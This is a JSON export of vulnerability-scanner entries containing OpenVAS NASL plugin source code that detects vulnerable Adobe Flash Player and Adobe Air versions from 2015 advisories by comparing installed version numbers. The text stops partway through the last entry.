"CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2018-09-18T00:00:00", "id": "OPENVAS:1361412562310805620", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805620", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_air_mult_vuln01_may15_win.nasl 11445 2018-09-18 08:09:39Z mmartin $\n#\n# Adobe Air Multiple Vulnerabilities - 01 May15 (Windows)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805620\");\n script_version(\"$Revision: 11445 $\");\n script_cve_id(\"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\",\n \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\",\n \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\",\n \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\",\n \"CVE-2015-3093\");\n script_bugtraq_id(74614, 74605, 74612, 74608, 74613, 74610, 74616, 74609, 74617);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-18 10:09:39 +0200 (Tue, 18 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-05-15 10:48:48 +0530 (Fri, 15 May 2015)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"Adobe Air Multiple Vulnerabilities - 01 May15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Improper validation of user supplied input.\n\n - A flaw in the Broker that is due to the BrokerCreateFile method not properly\n sanitizing user input.\n\n - An integer overflow condition that is triggered as user-supplied input is\n not properly validated.\n\n - An overflow condition that is triggered as user-supplied input is not\n properly validated.\n\n - Multiple unspecified memory disclosure flaws in Adobe Flash Player.\n\n - Multiple unspecified type confusion flaws in Adobe Flash Player.\n\n - Multiple unspecified flaws in Adobe Flash Player.\n\n - A a use-after-free error Adobe Flash Player.\n\n - An unspecified TOCTOU flaw in Adobe Flash Player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a\n context-dependent attacker to corrupt memory and potentially execute arbitrary\n code, bypass security restrictions and gain access to sensitive information,\n bypass protected mode, bypass validation mechanisms and write arbitrary data,\n bypass the sandbox when chained with another vulnerability, bypass ASLR\n protection mechanisms.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air versions before 17.0.0.172 on\n Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version 17.0.0.172\n or later. For updates refer to http://get.adobe.com/air\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air/Win/Installed\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"17.0.0.172\"))\n{\n report = 'Installed version: ' + airVer + '\\n' +\n 'Fixed version: ' + \"17.0.0.172\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-11T11:36:17", "references": ["https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "pluginID": "1361412562310805617", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "edition": 5, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-05-15T00:00:00", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Windows)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2018-09-10T00:00:00", "id": "OPENVAS:1361412562310805617", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805617", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_player_mult_vuln01_may15_win.nasl 11296 2018-09-10 09:08:51Z mmartin $\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Windows)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805617\");\n script_version(\"$Revision: 11296 $\");\n script_cve_id(\"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\",\n \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\",\n \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\",\n \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\",\n \"CVE-2015-3093\");\n script_bugtraq_id(74614, 74605, 74612, 74608, 74613, 74610, 74616, 74609, 74617);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-10 11:08:51 +0200 (Mon, 10 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-05-15 10:48:48 +0530 (Fri, 15 May 2015)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n - Improper validation of user supplied input.\n - A flaw in the Broker that is due to the BrokerCreateFile method not properly\n sanitizing user input.\n - An integer overflow condition that is triggered as user-supplied input is\n not properly validated.\n - An overflow condition that is triggered as user-supplied input is not\n properly validated.\n - Multiple unspecified memory disclosure flaws in Adobe Flash Player.\n - Multiple unspecified type confusion flaws in Adobe Flash Player.\n - Multiple unspecified flaws in Adobe Flash Player.\n - A a use-after-free error Adobe Flash Player.\n - An unspecified TOCTOU flaw in Adobe Flash Player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a\n context-dependent attacker to corrupt memory and potentially execute arbitrary\n code, bypass security restrictions and gain access to sensitive information,\n bypass protected mode, bypass validation mechanisms and write arbitrary data,\n bypass the sandbox when chained with another vulnerability, bypass ASLR\n protection mechanisms.\n\n Impact Level: System/Application.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player versions before\n 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.289 or 17.0.0.188 or later. For updates refer to\n http://get.adobe.com/flashplayer\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"13.0.0.289\"))\n{\n fix = \"13.0.0.289\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:playerVer, test_version:\"14.0\", test_version2:\"17.0.0.169\"))\n{\n fix = \"17.0.0.188\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:49:48", "references": ["https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "pluginID": "1361412562310805618", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "edition": 4, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-05-15T00:00:00", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Mac OS X)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2017-06-30T00:00:00", "id": "OPENVAS:1361412562310805618", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805618", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_player_mult_vuln01_may15_macosx.nasl 6497 2017-06-30 09:58:54Z teissa $\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Mac OS X)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805618\");\n script_version(\"$Revision: 6497 $\");\n script_cve_id(\"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\",\n \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\",\n \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\",\n \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\",\n \"CVE-2015-3093\");\n script_bugtraq_id(74614, 74605, 74612, 74608, 74613, 74610, 74616, 74609, 74617);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-06-30 11:58:54 +0200 (Fri, 30 Jun 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-05-15 12:35:31 +0530 (Fri, 15 May 2015)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Mac OS X)\");\n\n script_tag(name: \"summary\" , value: \"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name: \"vuldetect\" , value: \"Get the installed version with the help\n of detect NVT and check the version is vulnerable or not.\");\n\n script_tag(name: \"insight\" , value: \"Multiple flaws exists due to,\n - Improper validation of user supplied input.\n - A flaw in the Broker that is due to the BrokerCreateFile method not properly\n sanitizing user input.\n - An integer overflow condition that is triggered as user-supplied input is\n not properly validated.\n - An overflow condition that is triggered as user-supplied input is not\n properly validated.\n - Multiple unspecified memory disclosure flaws in Adobe Flash Player.\n - Multiple unspecified type confusion flaws in Adobe Flash Player.\n - Multiple unspecified flaws in Adobe Flash Player.\n - A a use-after-free error Adobe Flash Player.\n - An unspecified TOCTOU flaw in Adobe Flash Player.\");\n\n script_tag(name: \"impact\" , value: \"Successful exploitation will allow a\n context-dependent attacker to corrupt memory and potentially execute arbitrary\n code, bypass security restrictions and gain access to sensitive information,\n bypass protected mode, bypass validation mechanisms and write arbitrary data,\n bypass the sandbox when chained with another vulnerability, bypass ASLR\n protection mechanisms.\n\n Impact Level: System/Application.\");\n\n script_tag(name: \"affected\" , value:\"Adobe Flash Player versions before\n 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Mac OS X.\");\n\n script_tag(name: \"solution\" , value:\"Upgrade to Adobe Flash Player version\n 13.0.0.289 or 17.0.0.188 or later. For updates refer to\n http://get.adobe.com/flashplayer\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name: \"URL\" , value : \"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n## Variable Initialization\nplayerVer = \"\";\n\n## Get version\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\n## Grep for vulnerable version\nif(version_is_less(version:playerVer, test_version:\"13.0.0.289\"))\n{\n fix = \"13.0.0.289\";\n VULN = TRUE;\n}\n\n## Grep for vulnerable version\nif(version_in_range(version:playerVer, test_version:\"14.0\", test_version2:\"17.0.0.169\"))\n{\n fix = \"17.0.0.188\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-12T13:35:38", "references": ["https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "pluginID": "1361412562310805621", "description": "This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.", "edition": 6, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-05-15T00:00:00", "title": "Adobe Air Multiple Vulnerabilities - 01 May15 (Mac OS X)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2018-09-11T00:00:00", "id": "OPENVAS:1361412562310805621", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805621", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_air_mult_vuln01_may15_macosx.nasl 11334 2018-09-11 14:00:44Z mmartin $\n#\n# Adobe Air Multiple Vulnerabilities - 01 May15 (Mac OS X)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805621\");\n script_version(\"$Revision: 11334 $\");\n script_cve_id(\"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\",\n \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\",\n \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\",\n \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\",\n \"CVE-2015-3093\");\n script_bugtraq_id(74614, 74605, 74612, 74608, 74613, 74610, 74616, 74609, 74617);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-11 16:00:44 +0200 (Tue, 11 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-05-15 14:07:44 +0530 (Fri, 15 May 2015)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"Adobe Air Multiple Vulnerabilities - 01 May15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Improper validation of user supplied input.\n\n - A flaw in the Broker that is due to the BrokerCreateFile method not properly\n sanitizing user input.\n\n - An integer overflow condition that is triggered as user-supplied input is\n not properly validated.\n\n - An overflow condition that is triggered as user-supplied input is not\n properly validated.\n\n - Multiple unspecified memory disclosure flaws in Adobe Flash Player.\n\n - Multiple unspecified type confusion flaws in Adobe Flash Player.\n\n - Multiple unspecified flaws in Adobe Flash Player.\n\n - A a use-after-free error Adobe Flash Player.\n\n - An unspecified TOCTOU flaw in Adobe Flash Player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a\n context-dependent attacker to corrupt memory and potentially execute arbitrary\n code, bypass security restrictions and gain access to sensitive information,\n bypass protected mode, bypass validation mechanisms and write arbitrary data,\n bypass the sandbox when chained with another vulnerability, bypass ASLR\n protection mechanisms.\n\n Impact Level: System/Application.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air versions before 17.0.0.172 on\n Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version 17.0.0.172\n or later. For updates refer to http://get.adobe.com/air\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Air/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"17.0.0.172\"))\n{\n report = 'Installed version: ' + airVer + '\\n' +\n 'Fixed version: ' + \"17.0.0.172\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:52:33", "references": ["https://security.gentoo.org/glsa/201504-07"], "pluginID": "1361412562310121374", "description": "Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201504-07", "edition": 5, "reporter": "Eero Volotinen", "published": "2015-09-29T00:00:00", "title": "Gentoo Linux Local Check: https://security.gentoo.org/glsa/201504-07", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310121374", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121374", "sourceData": "# OpenVAS Vulnerability Test\n# Description: Gentoo Linux security check\n# $Id: glsa-201504-07.nasl 9374 2018-04-06 08:58:12Z cfischer $\n\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.121374\");\nscript_version(\"$Revision: 9374 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-29 11:28:48 +0300 (Tue, 29 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:58:12 +0200 (Fri, 06 Apr 2018) $\");\nscript_name(\"Gentoo Linux Local Check: https://security.gentoo.org/glsa/201504-07\");\nscript_tag(name: \"insight\", value: \"Multiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details.\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://security.gentoo.org/glsa/201504-07\");\nscript_cve_id(\"CVE-2015-0346\",\"CVE-2015-0347\",\"CVE-2015-0348\",\"CVE-2015-0349\",\"CVE-2015-0350\",\"CVE-2015-0351\",\"CVE-2015-0352\",\"CVE-2015-0353\",\"CVE-2015-0354\",\"CVE-2015-0355\",\"CVE-2015-0356\",\"CVE-2015-0357\",\"CVE-2015-0358\",\"CVE-2015-0359\",\"CVE-2015-0360\",\"CVE-2015-3038\",\"CVE-2015-3039\",\"CVE-2015-3040\",\"CVE-2015-3041\",\"CVE-2015-3042\",\"CVE-2015-3043\",\"CVE-2015-3044\");\nscript_tag(name:\"cvss_base\", value:\"10.0\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\nscript_category(ACT_GATHER_INFO);\nscript_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201504-07\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Gentoo Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 11.2.202.457\"), vulnerable: make_list(\"lt 11.2.202.457\"))) != NULL) {\n\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-12T13:36:13", "references": ["https://helpx.adobe.com/security/products/flash-player/apsb15-06.html"], "pluginID": "1361412562310805464", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "edition": 6, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-04-20T00:00:00", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Windows)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2018-09-11T00:00:00", "id": "OPENVAS:1361412562310805464", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805464", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_player_mult_vuln01_apr15_win.nasl 11334 2018-09-11 14:00:44Z mmartin $\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Windows)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805464\");\n script_version(\"$Revision: 11334 $\");\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3043\", \"CVE-2015-3042\", \"CVE-2015-3041\",\n \"CVE-2015-3040\", \"CVE-2015-3039\", \"CVE-2015-3038\", \"CVE-2015-0360\",\n \"CVE-2015-0359\", \"CVE-2015-0357\", \"CVE-2015-0356\", \"CVE-2015-0355\",\n \"CVE-2015-0354\", \"CVE-2015-0353\", \"CVE-2015-0352\", \"CVE-2015-0351\",\n \"CVE-2015-0350\", \"CVE-2015-0349\", \"CVE-2015-0348\", \"CVE-2015-0347\",\n \"CVE-2015-0346\", \"CVE-2015-0358\");\n script_bugtraq_id(74065, 74062, 74068, 74064, 74067, 74066, 74069);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 